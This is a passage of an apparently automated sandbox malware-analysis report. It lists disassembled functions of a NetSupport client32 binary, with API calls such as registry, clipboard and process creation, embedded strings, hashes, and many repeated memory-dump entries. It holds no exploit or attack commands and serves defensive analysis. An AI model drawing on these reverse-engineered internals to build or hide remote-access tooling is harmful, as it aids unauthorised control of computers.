                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                                                                                    • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 1300213680-78349004
                                                                                                                                                    • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                                                                                    • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                                                                                    • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                                                                                    • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                                                                                                    Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfA.USER32 ref: 1105F251
                                                                                                                                                    • wsprintfA.USER32 ref: 1105F265
                                                                                                                                                      • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,76968400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                                                                                      • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                                                    • wsprintfA.USER32 ref: 1105F5D6
                                                                                                                                                      • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                                                                                    • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                    • API String ID: 273891520-33395967
                                                                                                                                                    • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                                                                                    • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                                                                                    • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                                                                                    • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                                                                                    Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                                    • API String ID: 2111968516-2092292787
                                                                                                                                                    • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                                                    • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                                                                                    • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                                                    • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                                                                                    Function 11069590 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 110695BD
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11069621
                                                                                                                                                    • wsprintfA.USER32 ref: 11069651
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                                                                                                    Strings
                                                                                                                                                    • CloseTransports slept for %u ms, xrefs: 11069630
                                                                                                                                                    • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                                                                                                    • idata->n_connections=%d, xrefs: 1106964B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                                                                                                    • API String ID: 2285713701-3017572385
                                                                                                                                                    • Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                                                                                    • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                                                                                                    • Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                                                                                    • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                                                                                                    Function 1100D690 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                                                                                      • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                                                                                      • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                                                                                                    • _strrchr.LIBCMT ref: 1100D6EF
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                                                                                                    • wsprintfA.USER32 ref: 1100D720
                                                                                                                                                    • _memset.LIBCMT ref: 1100D731
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 1100D781
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                                                                                    • String ID: %sNSSilence.exe %u %u$D
                                                                                                                                                    • API String ID: 1760462761-4146734959
                                                                                                                                                    • Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                                                                                    • Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
                                                                                                                                                    • Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                                                                                    • Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
                                                                                                                                                    Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                                                                                                    • GetStockObject.GDI32(00000007), ref: 11003089
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110030A7
                                                                                                                                                    • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                                                                                    • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 11003128
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100312E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4121194973-0
                                                                                                                                                    • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                                                                    • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                                                                                    • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                                                                    • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                                                                                    Function 1113F710 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                                                                                                    • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                                                                                                    • GetPropA.USER32(?), ref: 1113F85D
                                                                                                                                                    • wsprintfA.USER32 ref: 1113F88F
                                                                                                                                                    • RemovePropA.USER32(?), ref: 1113F8C1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                                                                                                    • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                    • API String ID: 2013984029-1590351400
                                                                                                                                                    • Opcode ID: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                                                                                    • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                                                                                                    • Opcode Fuzzy Hash: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
                                                                                                                                                    • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                                                                                                    Function 110099B0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 252COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strtok$_malloc
                                                                                                                                                    • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                                                                                                    • API String ID: 665538724-3655815180
                                                                                                                                                    • Opcode ID: 39f51e78e1d6d557cb57fe6939ee2718794244c86e9f6e4480e23a56394e5660
                                                                                                                                                    • Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
                                                                                                                                                    • Opcode Fuzzy Hash: 39f51e78e1d6d557cb57fe6939ee2718794244c86e9f6e4480e23a56394e5660
                                                                                                                                                    • Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91
                                                                                                                                                    Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CountClipboardFormats.USER32 ref: 11033091
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                                                                      • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                                                                    • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                                                                                    • GetLastError.KERNEL32 ref: 110331BF
                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
